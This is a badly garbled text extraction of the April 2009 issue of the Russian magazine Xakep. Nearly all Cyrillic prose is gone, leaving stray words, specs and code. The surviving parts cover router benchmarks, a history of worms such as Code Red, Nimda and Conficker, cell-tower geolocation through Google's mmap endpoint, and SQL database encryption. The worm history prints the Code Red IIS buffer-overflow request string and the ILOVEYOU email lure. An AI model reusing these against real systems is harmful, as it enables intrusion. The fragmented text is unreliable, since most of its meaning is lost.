Хакер 2009 04 PDF

WORDPRESS
. 52
x 04()2009
w w w.xakep.ru
Code red
04 (124) 2009
PC27

WWW.GAMER-CITY.RU
. 4
Loveletter
10 / 1999-2009
Nimda
Melissa
J3
Slammer

1999-2009
6
Sasser
Storm
. 20
8
Warezov
PC27 adaptor
7
Mebroot
10
Sony rootkit
GPS
124
. 26

!

. 32

TWITTER

PYTHONE
. 88
Intro
Intro
Intro
Intro
Intro
Intro
1999 , ,
.
,

.
Downadup,
Windows-.
.
, -

10 .
nikitoz, . .
P.S. -
Gameland .
4.
CONTENT
04(124)
004 MEGANEWS
FERRUM
016
N Wi-Fi
Nimda
080
084
PC_ZONE
026
030
032
088

10
094
042
048
052
058
064
070
EASY HACK

WORDPRESS:

CISCO
102
110
115
The Pirate Bay

Win2k8:
FreeBSD Jail

120
127
-
BITTORRENT
IP-PBX Asterisk
124
072
SYN/ACK
106

Apple iPhone

IPHONE
-TOOLS
Twitter Pythone
098
038

Python CorePy

IP, GSM/UMTS Wi-Fi
10 -
GPS
,
UNIX-
Linux
Draft N Wi-Fi
020
128
(2009, VHSRIP)
][-
FAQ UNITED
FAQ
8,5
WWW2
web-
Mebroot
1C
020
CRYPTO

026
048
BID
032
Secunia
088
OSVDB
ISS X-Force
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

(komarov@gameland.ru)
>

/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

/XAKEP.RU
>

(xa@real.xakep.ru)
/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.
ru)
>

>

>
( )
(strekneva@gameland.ru)
>

>

> -
(alekseeva@gameland.ru)
/PUBLISHING
>

(noah@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>PR-

(litvinovskaya@gameland.ru)
>

(andrey@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.

.
.
Gameland

, ,
Gameland TV.
,

content@gameland.ru.
>> meganews
J3
PC27
PC27
J3
MIFRILL / MIFRILL@R EAL.XAKEP.RU /

Samsung
Samsung
. 50 20, 21,5 23.
: 2
, , 5 ;
50.000:1; 300 /2.
: 1200900
19201080 . MagicBright3,
, :
, , , , ,
.
, ,

. - , 50 .
-,
.

(game)land

! 25 26

,
,

.
www.gamer-city.ru! !

. Xbox 360,

,
-, . ,
, .
,
004
APPLE, IPHONE
OS
30
.

. !
-
:

:
., . 153 , -153
. 2,
.2,
.7,

., .13,
F.E.A.R. 2: Project Origin(PC)

Call of Duty: World at War(PC)
GRID (PC)
Gears of War 2 (Xbox 360)
Mortal Kombat vs. DC Universe (Xbox 360)

www.gameland.ru
FAQ.
X 04 /124/ 09
>> meganews
PC27
PC27

. , , , , .
76.000 , ( ). , ,
, ,
, , .
,

,
. .
, , ,
, .
, ?..
e-ink
, ,
. ( ,
E-ink, ) FLEPia
Fujitsu Frontech Limited Fujitsu Laboratories Limited.
8" 7681024
260.000 .
8
, .
4096 5 ,
64 - 1.8 .
:
Windows CE5.0 , , Wi-Fi IEEE802.11b/g Bluetooth
Ver2.0+EDR, USB, SD- 4 .
, ,
2400 64- (
7000-9000 ).
$1015, .
, , .
FLEPia, :).
HP
,

,
006

HP.
- ,

.
, ,
,
,
DVD- CD-

.

, ,

5%.
,

.
HP
,
,
.
X 04 /124/ 09
>> meganews
PC27
Gmail
,
e-mail,
? ,

-
... , ,
Send (
!). , ,
, .
, -
J3
Google .
Gmail
undo sent,
.

.
5 ,
.
,
, 5-
, , .
JIWIRE,

WI-FI .
, !

, , ,
.
Amazon.com
(,
, ).
,
. ,

,

, -,
- .

,
. Bristol
Bookbarn ,
.
,
, (

150 ). ,
,
.
Amazon.
com ,
-
.
IE 8.
Microsoft, -,

Internet Explorer 8.
19 , 20- :). PWN2OWN,
3Com, .
Nils,
IE7,

Windows 7
IE8
.

. Nils -
008
5000
Sony Vaio,
Microsoft
Security Research Center.
,
, IE8
.

(
Google Chrom), InPrivate

SmartScreen.
X 04 /124/ 09
>> meganews

sci-fi
,

. , ,
,
, .

,
.
,
,
, ,
.

,

,
.
,
,
,
, ,

TED. ,
,
,
, .
,

.
PC27
,

CeBIT 2009 Gigabyte Technology
,
Touch Note M1028 Booktop M1022. 10.1
, ,
. , , 1024x600 1366x768
. , Wi-Fi,
Bluetooth Express Card.
. Booktop M1022 -,
.
, 10.1
, 3.5G,
HSDPA .

,

( !). ,
Ghost in the shell ,
-
.

, .
010
,
2 . ,

,

USB-.
,
2.0 .
X 04 /124/ 09
>> meganews
PC27
PANDA SECURITY :
10 .
,
.
IBM + SUN = ?
The Wall Street Journal.
, , IBM
Sun Microsystems,
. , ,
, 6.5 . . ,
IBM
, , .
,
Windows

Phillips, OLED-.
Phillips
(OLED),

,
,
.
OLED ,

.
, ,
,

.
,
, .
012

, CeBIT 2009 . Asus
Asus-Lamborghini VX5,
Asus
Lamborghini Reventon. ,
.
Core2 Quad, 4
SSD- 1 . -, , Vx5 ,
.
16 Full-HD,
NVIDIA GeForce GT 130M 1 GDDR3 VRAM,
- Blu-ray.
, ,
TwinTurbo, ,
. ,
.
SECUNIA, FIREFOX
115 , 4
, .
X 04 /124/ 09
>> meganews

, -, ,
Blu-ray ,
. , , , , 100 . . , , , Blu-ray -
.
DVD-, .avi. , Blu-ray
, .
1000 , , Blu-ray 1500 . ,
100 1 .
83%
.
, , .
.
, ,

,
, ,
.
Virtual Cocoon
.
.
( )
. , ;
HD-, 30
. , , , . ,
5 . ,
- , 1.500 .
X 04 /124/ 09
013
>> meganews
PC27

Microsoft.
,
,
The Business Insider,
Microsoft
Office 14 .

.

, ,
.
,
Office 14,
.
2010 ,

.
,
Microsoft
.

LiveJournal
. ,
- Microsoft Hotmail,
. Hotmail

, LJ, e-mail ,
, ,
,
.
,
. ,
,

.
iPod Suffle
Apple
-
iPhone OS 3.0,
, iPod suffle 4 .

. iPod

,
, ,

.
iPod shuffle
,

. -

, ,
,
.
, ,
, iPod shuffle
.
iPhone . ,
,

Apple
Made for iPod,

suffle.
,

,

.
Apple ,
iPod shuffle 14
( ).

VoiceOver ,
, .

, . ,
,
$79.

,

, .
, ,

,
,
,
.
, Sophos

,
.
014

,
, .
,
, ,

Diebold .
,
,

.

, Diebold Agilis.
?
X 04 /124/ 09
>> meganews
Eee

CeBIT

Eee Asus.
Eee Keyboard
PC,
CeBIT-PreView
Awards,
5 .
Keyboard PC

,
-
! Eee PC
T91
,
8.9. 0.96
5 ,
802.11b/g/n,
Bluetooth 3G plus, GPS
-.
Eee Eee
Top ET1602,
; Eee Box PC B206

HD;
Skype- Eee Videophone;
Eee Stick .
.
47%
ADFUSION
,
E-MAIL,
.
X 03 /123/ 09
015
>> ferrum
Draft N Wi-Fi
N
Draft N .

.
.
, WiFi-
.
, ,
. ,
TRENDnet .

WAN-. ,
,
PPTP/L2TP PPPoE.

, TCP/IP.

VPN-.
VPN-
. ,
.
016

:
1. NAT (

Static IP Dynamic IP WAN-).
, NAT
: WANLAN (
download), LANWAN (
upload) FDX (
).
2. PPTP.
- .
WAN- VPN-,
CPU , .
(PPPoE, PPTP L2TP) PPTP
; ,
.
3. Wi-Fi ASUS WL-100N, D-Link DWA645, TRENDnet TEW-624UB.

.
1 /.
WiFi-.

.

. ,
,
,
10 .
WPA-PSK-TKIP.
X 04 /124/ 09
>> ferrum
PPTP

:
ASUS WL-500W 1.9.8.2
ASUS RT-N15 1.0.1.7
D-Link DIR-615 2.25 B09
D-Link DIR-655 1.12 B04
NETGEAR WNDR3300 1.0.26
TRENDnet TEW-632BRP 1.10 B08
TRENDnet TEW-633GR 1.0.30
TRENDnet TEW-633GR
fdx
I w
wI
TRENDnet TEW-632BRP
D-Link DIR-655
D-Link DIR-615
ASUS WL-500W
ASUS RT-N15
0
000
20
40
/
60
80
100
120
D-Link DIR-655 TRENDnet TEW-633GR

5700 .
5500 .
ASUS RT-N15
:
: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)
10/100/1000 /
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES/TKIP+AES), WPS
: NAT/NAPT, DynDNS, Static Routing, DHCP
: SPI, Packet Filter, URL Filter, MAC Filter
: WAN Bridging
ASUS Draft N ,
, . RT-N15
ASUS.
, . WAN-
, ( NAS ). WAN-Bridging,
, IPTV .
, WAN-
. , CPU
, IGMP-proxy.
WPS,
Wi-Fi .
PPTP, ASUS RT-N15 ,

(ASUS WL-500W) 20 /.
X 04 /124/ 09
ASUS WL-500W
:
: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100
/
/)
: 2,4 - 2,5
(TKIP/AES/TKIP+AES)
: NAT/NAPT, DynDNS, Static Routing, DHCP
: SPI, Packet Filter, URL Filter, MAC Filter
: 2 USB 2.0 USB-,
..
ASUS WL-500W, Draft N .

ASUS WL-500GP.

open-source Linux, .
(
WAN-). WL-500W Draft N .
ASUS.
USB 2.0 , ,
web-.
. PPTP- , , 20 /. WL500W NAS ,

2 / , .
017
>> ferrum
WI-FI (10, )
WI-FI (1, )
TRENDnet TEW-633GR
ap-pc
fdx
pc-ap
TRENDnet TEW-632BRP
TRENDnet TEW-633GR
D-Link DIR-655
D-Link DIR-655
D-Link DIR-615
D-Link DIR-615
ASUS WL-500W
ASUS WL-500W
ASUS RT-N15
ASUS RT-N15
000
ap-pc
fdx
pc-ap
TRENDnet TEW-632BRP
20
40
/
60
80
100
120
000
10
20
30
/
40
50
60
70
80
Wi-Fi D-Link DIR655, TRENDnet TEW-633GR, ASUS
10 ASUS WL-500W,
D-Link TRENDnet
D-Link DIR-615
D-Link DIR-655
: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100

/
/)
: 2,4 - 2,5
(TKIP/AES/TKIP+AES), WPS
: NAT/NAPT, DynDNS, DHCP, Traffic Shaping
: SPI, Packet Filter, URL Filter, MAC Filter, Access
Control
: IPv6 Ready
: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)

10/100/1000 /
/)
: 2,4 - 2,5
(TKIP/AES), WPS
: NAT/NAPT, DynDNS, DHCP, Static Routing, QoS Engine
: SPI, URL Filter, IP/MAC Filter, Access Control
:
2800 .
D-Link, Draft N .
IPv6. , IPv4 IPv6
, D-Link
! WAN- D-Link
DIR-615 . ,
(D-Link DIR-655), WAN-
VPN- .
IGMP Proxy, multicast
IPTV , .

L2TP- .
018
5100 .
,
. 1.12WW Build
04 WAN-. , D-Link DIR-655 . NAT
250 /, PPTP 90-100 /
. Wi-Fi .
90 /,
10 60 /. , IGMP-proxy, multicast- IPTV
.
PPTP .
L2TP-
.
X 04 /124/ 09
>> ferrum
WI-FI (1, )
WI-FI (10, )
TRENDnet TEW-633GR
ap-pc
fdx
pc-ap
TRENDnet TEW-632BRP
TRENDnet TEW-633GR
D-Link DIR-655
D-Link DIR-655
D-Link DIR-615
D-Link DIR-615
ASUS WL-500W
ASUS WL-500W
ASUS RT-N15
000
ap-pc
fdx
pc-ap
TRENDnet TEW-632BRP
ASUS RT-N15
0
0.2
0.4
/
0.6
0.8
1.2
1.4
D-Link
DIR-655 TRENDnet TEW-633GR,
2900 .
TRENDnet TEW-632BRP
:
: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100
/
/)
: 2,4 - 2,5
(TKIP/AES), WPS
: NAT/NAPT, DynDNS, DHCP, Static Routing
: SPI, Packet Filtering, Domain/URL Filtering, MAC
Filtering
: WPS
TRENDnet TEW-632BRP
, D-Link DIR-615. , TRENDnet ,
WAN-. ,
, .
NAT
(WANLAN LANWAN) 100 /. WPS ,
WiFi-. WPS PIN-
web- .
000
0.2
0.4
/
0.6
0.8
1.2
1.4
10
D-Link DIR-655 TRENDnet TEW-633GR
6000 .
TRENDnet TEW-633GR
:
: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)
10/100/1000 /
/)
: 2,4 - 2,5
(TKIP/AES), WPS
: NAT/NAPT, DynDNS, DHCP, Static Routing, Traffic
Shaping
: SPI, Packet Filtering, Domain/URL Filtering, MAC
Filtering
: StreamEngine, WPS
TEW-633GR Draft N
TRENDnet. (
WAN-) ,
NAT ( 300 /). , 100 /.

NAS-. PPTP-
. TRENDnet TEW-633GR D-Link DIR-655. WPS, WiFi-
.
,
WAN-. TRENDnet
PPTP- 10 /.
-. , .
, .
, -
2000 , 3000.
X 04 /124/ 09
.
TRENDnet TEW-632BRP /
.
D-Link DIR-655, Wi-Fi Draft N
. z
019
>> pc_zone
3
Code red
Loveletter
/ STEP@GAMELAND. RU/
1
Melissa
J3
Slammer
6
Sasser
Nimda
9
Storm
Mebroot
8
Warezov
10
Sony rootkit
10
.
.
-, , .
10 .
020
X 04 /124/ 09
>> pc_zone
Melissa
Loveletter
MELISSA 100
1999

- ,
.
, , ,
Melissa.
26 alt.sex Usenet

.
List.DOC, 80
: , .
-:
, 50
.
, e-mail.
2000

, Love Letter ( Love
Bug). ,
ILOVEYOU , .
,
Visual Basic
Script, .
Melissa
Loveletter
The Subject: ILOVEYOU

Message body: kindly check the
attached LOVELETTER coming from me.
Attached file: LOVE-LETTER-FORYOU.TXT.vbs
,
.
, , ,

.
, .
X 04 /124/ 09
ILOVEYOU
Melissa MS Word 97/2000, ,

Outlook. Visual Basic
MS Windows
. MS Outlook, 50 email
.
,
,
, .
, ,
,
.
1999 , -

Windows Scripting Host,

MS
Outlook, ,
.

Internet Explorer. ,

.

. , WIN-BUGSFIX.EXE
Microsoftv25.exe
.

.
,
, .vbs. rulez.mp3,
rulez.mp3.vbs
.
- ,
.

, .

. 27
; 29

, ,
.
,

VB, 10 ,
, 20
$5000.
,
Melissa.
,
,
mIRC

IRC-. HTML-,
ActiveX-. , ,
: ,
, .
Love Letter 4 2000 .,

, NASA, , , ,
. ,
,
$5 . ?
: barok -loveletter(vbe)
< i hate go to school > by: spyder / ispyder@mail.
com / Manila,Philippines.
,
.
021
>> pc_zone
CODE RED
SLAMMER
Code Red
Slammer
2001
-
2002
IP- :). 13 2001 , Code Red IIS
. ,
, Microsoft
, . ,
13 6
350 .
ISS
. Code
Red
,
. Code
Red IIS -,
HTTP- IP- ,
- 80- IIS.
.
Code Red
2002

2001

, , .
,
. Nimda
,

.
.
1.
,
Internet Explore,
. README.EXE (,
, ++)
,
.
Nimda
022
, GET-,
.
Apache, , ,
IIS , :
GET /default.ida?NNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNN%u9090%u685
8%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u6858%ucbd3%u7801%u9090%
u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0
Code Red
. :
,
TCP/IP-
.
.

,

,
MAPI-
Microsoft Exchange.
2. .
Nimda
, .EML .NWS. ,
,
.
3. IIS,

. Nimda
-
directory traversal. -
,
Code Red, .

: HELLO!
Welcome to http://www.worm.com! Hacked By
Chinese!,
,
. , , : ,
.
20 28
DoS-
IP-,
.
Code Red II, , ,

,
cmd.exe \inetpub\scripts\ ISS-. Code Red,

.
.
4. Nimda

, Code
Red II sadmind/IIS.
, Nimda
, .
Guest . ,
.
,
.
,
, ,
: Concept Virus(CV) V.5,
Copyright(C)2001 R.P.China
X 04 /124/ 09
>> pc_zone
Sasser
email
DESKTOP
COMPUTER
email c
WEB
SERVER
IIS
Code Red
DESKTOP
COMPUTER
IIS
Code Red
WEB
SERVER
DESKTOP
COMPUTER
OR FILE
SERVER
NIMDA
Nimda

SASSER
2003

, 25
.
,
.

Slammer.
12:30
, 12:33
8.5 .
Microsoft
SQL Server, David Litchfield BlackHat.
1434
,
, ,
.
, 75.000 - ,
? IIS,

,
UDP, ,
376 , UDP-. Slammer
TCP,
-, UDP
!
,
6 ,
, Slammer . ,

.

24 . :
27
. , , , SQL.
2004
-,
System Shutdown, NT AUTHORITY\SYSTEM

, Blaster,
2004,
Sasser.
, .
Sasser Local Security Authority
Subsystem Service (LSAS)
. ++ Sasser 128 , ,
IP-,
445
.
, ,
. Sasser 9997
,
.

FTP,
5554 .
, - , Sasser

,
.
Sasser -
,
, .
,
.
,

.
18- ,
.
- ,
Microsoft
250.000 . Sasser,
Netsky.
Slammer
Sasser
X 04 /124/ 09
023
>> pc_zone
Sony rootkit
BSOD - SONY ROOTKIT
Warezov
WAREZOV
2005
2006
2007
. ,
,
. $sys$aries
(aries.sys) , $sys$
API-. Win32/
Rootkit.XCP System
Service Table (SST)
: NtCreateFile, NtEnumerateKey,
NtOpenKey, NtQueryDirectoryFile,
NtQuerySystemInformation. , ,
.
: , , ? ,
-
, ? .
,

. :
,
, .
, -
,
-
, .
, Sony
,
.
2006 ,

-
,
. ?
Warezov ( Stration),
,
email.
, . :
.
Warezov
, ,
. ,
30
.
.
, - ,
IM-. Warezov
,
Skype!
, Warezov

.
URL- (, , ),
. -
,
. Warezov
,
.
SMTP-. , ,
. fast-flux ,

IP- . IP
,
. Warezov
: -, reverse HTTP proxy, () , DNS-,
Bind Windows
.
,
Storm,
. P2P-,
. IP- ( fast-flux
domains). .

. ?

19
2008 , ,
,

Full Clip.exe, Full Story.exe, Read
More.exe Video.exe.
,
,
,
. Storm ,

(
30-45 ),
. .
,
,
. ,
.
, Storm
: Win32.agent.
dh,

,
DDoS-.
:
,
! Win32/
Rootkit.XCP, sony rootkit,
-CD, Sony
BMG.
DRM-
(Digital Rights Management),
First 4 Internet, . ,

,
-
Sony rootkit
Warezov
Storm
024
X 04 /124/ 09
>> pc_zone
MEBROOT
FAST-FLUX

DOWNADUP
Merboot
COMPROMISED
PCs
,

NS.SUPERSAMEAS.COM
STORM BOTNET
211.51.164.123
Downadup
HOME
PC
QUERY:
WWW.SUPERSAMEAS.COM
3
HTTP GET:211.51.164.123
Storm
2008
,
, . 2005
Black Hat
eEye Digital Security ,

,
Windows
. , 2008
,
2009
,
, -: Downadup, Conficker, Kido. :

,
.
,
.
,

MS08-067
( ).

RPC,
wcscpy_s
Merboot
Downadup
X 04 /124/ 09
MS08-067
,

ADMIN$
, Mebroot.
2005
-
,
, .
:
.
MBR ( ),
- ,

netapi32.dll. -,

.
,
,

ADMIN$. : Autorun.inf
(
) . =
!
,
(
, DDoS ..).

MS08-067,

WINDOWS
Windows, .
, MBR
, ,
. ,
,
API- MBR.

,
Windows ,
.

-
.
250
, .

.
, .
API-, DNS,
,
, , kaspersky, nod, symantec,
microsoft .. z
025
>> pc_zone

/ STEP@GAMELAND. RU/
GPS
IP, GSM/UMTS Wi-Fi
, GPS, .
,
, . ,

.
, GPS , ,
? .

. ?
, :
1. IP
, , .
2.
GSM/UMTS. .
3.
Wi-Fi, .
, .
IP
IP, ,
, VPN ,
ip2location.com. , , IP-,
, (, ,
), . ,
-.
, ,
, IP. ,
, (, hotspot
),
, . ,
, . ,
026
, .
,
IP-, WiFi-,
.
,
ip2location.com, .
, ,
, .
IP- ,
ip2location
. ,
, : .cvs () .bin
().
. , IP-
, PHP-
IP- :
function Dot2LongIP ($IPaddr)
{
if ($IPaddr == "") {
return 0;
} else {
$ips = split ("\.", "$IPaddr");
return ($ips[3] + $ips[2] * 256 + $ips[1] * 256 * 256
+ $ips[0] * 256 * 256 * 256);
}
}
,
X 04 /124/ 09
>> pc_zone
ip2location
MNC, MCC, LAC, Cell ID

,
IP-? ! :)
.
BIN-, . Perl, C, Python, PHP, Ruby,
C#, VB.NET, Java, Visual Basic
(http://www.ip2location.com/developers.aspx), . PHP
IP2Location.inc.php :
<?php
include("IP2Location.inc.php");
$ip = IP2Location_open("samples/IP-COUNTRY-SAMPLE.BIN",
IP2LOCATION_STANDARD);
$record = IP2Location_get_all($ip, "_IP-_");
echo "$record->country_long : " . $record->country_long;
echo "$record->city : " . $record->city;
echo "$record->isp : " . $record->isp;
echo "$record->latitude : " . $record->latitude;
echo "$record->longitude : " . $record->longitude;
IP2Location_close($ip);
?>
,
Google Maps, :
http://maps.google.com/maps?f=l&hl=en&q='+query+'&near
='+str(lat)+','+str(lng)+'&ie=UTF8&z=12&om=1
!
,
,
. ,
Google Maps (www.google.com/gmm).
, -,
,
. ,
maps.google.com .
(
Opera Mini) , Google, , .
,
Java, Windows
Mobile Symbian S60 3rd Edition, BlackBerry,
Android, , . iPhone Google
Maps . ,
,
.
. , GPS :
! , X 04 /124/ 09
,
! , .
,
, . ,
. ,
.
CellID ( CID)
, . , , , ,
.
, , .
, ,
,
. Google Maps , .
?
, .
, , ( , ,
). , ,
, :).
, , ,
. !
Google
Google Maps,
GPS. :
, (
) ,
. .
GSM-

,
Google ? , ,
,
? , !
Google Maps, API, , . http- , ,
http://www.google.com/
glm/mmap, ,
.
027
>> pc_zone
links
Google
Maps: mapki.com/
wiki/Google_Map_
Parameters.
GPS-

:
tinkerlog.com/2007/
07/13/interfacing-anavr-controller-to-agps-mobile-phone.

Yahoo:
developer.yahoo.
com/yrb/zonetag/
locatecell.html.

Google Maps.
PHP: http://www.
witracks.com.br/
gmaps.txt.
j2me: http://www.
mapnav.spb.ru/site/
e107_plugins/forum/
forum_viewtopic.
php?9736.
Python S60:
http://blog.jebu.
net/2008/07/googlecell-tower-mappingwith-python-on-s60.
C#: http://maps.
alphadex.de/datafiles/
fct0e1b11782832f02.
cs.
Delphi: http://
forum.netmonitor.ru/
about4470-0-asc-60.
html.
dvd

,

.
028
Google
NetMonitor Symbian

Wi-Fi:

: MCC, MNC, LAC CellID.
MCC ( 250)
MNC ( 01, 02,
99 ..)
LAC ( ,
,
)
CellID (CID) ,
, ,
!
Google Maps ,
,
myl:MCC:MNC:LAC:CellID.
netmonitor:
, ( ),
.
,
.
, ,
.
Python,
Skvo forum.netmonitor.ru:
net, cid, lac = 25002, 9164, 4000
import urllib
a = 000E00000000000000000000000000001B000000
0000000000000000030000
b = hex(cid)[2:].zfill(8) + hex(lac)[2:].
zfill(8)
c = hex(divmod(net,100)[1])[2:].zfill(8) +
hex(divmod(net,100)[0])[2:].zfill(8)
string = (a + b + c + FFFFFFFF00000000).
decode('hex')
try:
data = urllib.urlopen('http://www.google.
com/glm/mmap',string)
r = data.read().encode('hex')
if len(r) > 14:
print float(int(r[14:22],16))/1000000,
float(int(r[22:30],16))/1000000
else:
print 'no data in google'

except:
print connect error
, ,
Python ( 2- , 3-
), http://python.
org/download/releases. ,
, NET (MCC
MNC, ), CID, LAC.
http://www.google.com/
glm/mmap .
, , , 59.200274 39.836925.
: no data in google.
, , NET LAC
CID ( 1 65536), , ,
, .
,
GUI-, C# (
).
, Google
Maps.
. ,
,
LAC CellID. MCC/MNC
,
LAC, CellID.

,
. .
; ,
100
, !
, .
, , .
, Google,
Cell ID, LAC, NET :
http://mobile.maps.yandex.net/cellid_locati
on/?&cellid=%d&operatorid=%d&countrycode=%d
&lac=%d
,
XML-, .
X 04 /124/ 09
>> pc_zone
Google,

Google Maps,
, , . , , -
, ,
. , ,
:
. ,
. :
1. ;
2. , ;
3. NMEA,
GPS-, .
VirtualGPS (www.kamlex.com),
Windows Mobile 2003, WM
5, WM 6, WM 6.1. lite-
GPS.
,
, ,
, GPS-.

Google Maps
, - SKYHOOK
.
, Wi2Geo (wi2geo.ru),
- Wi2Go :). Windows Mobile, Symbian, Windows Mac OS
X, IP-,
GSM , , Wi-Fi. , API (http://labs.
wi2geo.ru/basicapi.php). ,
, Wi-Fi.
.
?
WI-FI
, WiFi-
, , , . , :). :
,
MAC- ( SSID)
.
.
, Wi-Fi ,
, , . WPS (Wi-Fi Positioning System) SKYHOOK Wireless (www.skyhookwireless.com),

. , , API-, . Firefox Geode (http://
labs.mozilla.com/geode_welcome),
- (
, ).
NetMonitor
,
, , . ,
,
!
Symbian: FieldTest, CellTrack, Best GSMNavigator
Windows Mobile 2005: GPS Cell
Windows Mobile 5.0/6.0: NetMonitor32, WMCellCatcher,
CellProfileSwitcher (,
-)
X 04 /124/ 09
,
.
,
. , ,
. Google
Google Latitude, Google Maps. ,
,
?
. http://forum.xda-developers.com/
showthread.php?t=340667 , WM, -.
Google
Earth. ,
! z

.
, . celldb.org/aboutapi.
php, www.opencellid.org/api, http://gsmloc.org/code, cellid.telin.
nl. API
HTTP-,
MCC, MNC, Cell ID LAC.
Netmonitor.ru,
, ,
, 2 Skylink. ,
.
029
>> pc_zone
1) :
152
155
157
160 163
165
168
170
173 175
178 180
183
185
188 191

50-75 c.
178 c.
166 .
124 .
100 - 200
109 .
67 .
44 .
2)

.

/ VITYA31@MAIL.RU/

, .
>> pc_zone
18 ,
, ! .
, ? IT
,

.
,
,
Windows, .
030

,
, ,
,
. ,
.
,
,

. , ? Workrave (http://
www.workrave.org/welcome),
, !

.
, ,
. ,
, .
X 04 /124/ 09
>> pc_zone

. ,

(). 10-
( ).
.

, , . ,
.
, ,
, ,
.
.
: ,
,
. , ,
, . Workrave ! ,
.

.
: , :).
, ,

, : .
( ,
)
.

.
,
. ,
,
.
- Workspace
Planner (internalapps.ergotron.com/MirWebTool/
ergoTool_metric.html)
, .
1988 ,
. :
,
(, ,
?), .
:

,
.
X 04 /124/ 09
Workrave

, ,

.
, , ,
,
. , , , ? , !
,

.
, .
- . -: ,
- ,
.
f.lux (www.stereopsis.com/flux).

.
,
.
: !
, ,

( ).
, ,
. f.lux ,

: .
Google,

.
Windows, Linux Mac OS X.
.
40-50 .
,
. ,
,
, .
: EyesKeeper (www.
gi.ru/eyeskeeper) .
,
.
. , ,
-
, .
:). z
021
>> pc_zone

1C
CRYPTO
1C
CRYPTO
/ KOMAROV@ITDEFENCE.RU /
>> pc_zone
, . ,
, .
. , .
, .
. ,
,
. ?
,
032
.
,
.
,

. , . ,
, : ,
.
,

. 1,
X 04 /124/ 09
>> pc_zone

( ,
XOR ),
. ,
,
.
,
.
,

. ,

!
DES_ENCRYPT(),
MySQL .
, :
INSERT
INTO
t
VALUES
(1,AES_
ENCRYPT('text','password'));
, .
SQL- ,

. ,
AES_DECRYPT(AES_ENCRYPT())
unhex(hex()).
!
:

, ,
.
,

, ! , :). Spelabs
(spellabs.ru/spellabsCrypto1C.htm) -
,
1 ,
.
, ,
. , .
,
!
, , ,
,
.
MySQL
14 ,
:
AES_ENCRYPT() AES
AES_DECRYPT() AES
COMPRESS()

DES_ENCRYPT() DES
DES_DECRYPT() DES
ENCODE()

(
plaintext )
DECODE()
,
ENCODE()
ENCRYPT()

Unix crypt
MD5()
MD-5
SHA1(), SHA() SHA-1 (160)
SQL-, AES_ENCRYPT()
X 04 /124/ 09
T-SQL
,

(
), .

().
,
. ,

.
Microsoft
SQL Server,
.
T-SQL,
SQL.
,
.
EncryptByCert(),
. .
? .
, andrej Bank
:
USE Bank;
CREATE CERTIFICATE andrej
ENCRYPTION BY PASSWORD =
'pGFD4bb925DGvbd2439587y'
#

# FROM FILE = 'c:\Shipping\Certs\
Shipping11.cer'
# WITH PRIVATE KEY (FILE = 'c:\
Shipping\Certs\Shipping11.pvk',
WITH SUBJECT = 'Employers
Access',
EXPIRY_DATE = '10/31/2009';
GO
,
SQL-:
INSERT INTO [].[]
values( N' ',
EncryptByCert(Cert_ID('andrej'),
@cleartext) );
GO

@cleartext andrej.
.
,
( ,
).
: DecryptByCert().
,
. , , ,
(passphrase).
,

. , .
, .

:
SELECT
convert(nvarchar(max),
DecryptByCert(Cert_Id('andrej'),
ProtectedData,
N'pGFD4bb925DGvbd2439587y'))
FROM [].[]
WHERE Description
= NEmployers Access;
GO
[].[],
Employers Access.

Andrej pGFD4bb925DGvbd2439587y.

varbinary nvarchar.
, ,

.

, ,
.
,
, .
!
,
,
033
>> pc_zone
info

:
,

;

,

(
),

;

.
,

MSSQL 2008 ( Enterprise).

TDE (Transparant
Database Encryption).
. , ,
,

. ,
,

, .

.
SQL Shield (www.sql-shield.com).
/*sqlshield*/ WITH
ENCRYPTION ,
. ,
:
CREATE PROCEDURE MyTest

WITH /*sqlshield*/ ENCRYPTION
AS
SELECT 2+2
:
MyTest
> 4
, ,
.
SQL Server Syscomments Decryptor (www.
geocities.com/d0mn4r/dSQLSRVD.html),

. !

- .
, :
warning
SQL Server

ANSI_PADDING
OFF
-
!
034
ID
354
643
411
LastName
Somov
Antipova
Timurov
FirstName Emp
Sum
Oleg
IT-Manager M0x8900f56543
Alexandra Director
4343Lax#dsdsss
Valeriy
Technical Dep. 0x2322322222
, .
, .
, . ,
. , ,
, , . ,
. : , , .
X 04 /124/ 09
>> pc_zone

- SQL 2005
?
XP_CRYPT (xpcrypt.com).
,
. ,
, ,
( ,
),

GUI-.

. , -
SQL Server ( , , ) WITH ENCRYPTION. ,

, . Microsoft. ,
! , , :
1) SQL Server GUID , ,
colid syscomments ( , 1 2)
;
2) SHA;
3)
RSA. ,
;
4)
XOR. , ctext
syscomments.
:
(GUID colid)
. , ,
dSQLSRVD. , GUID (
) ;
,
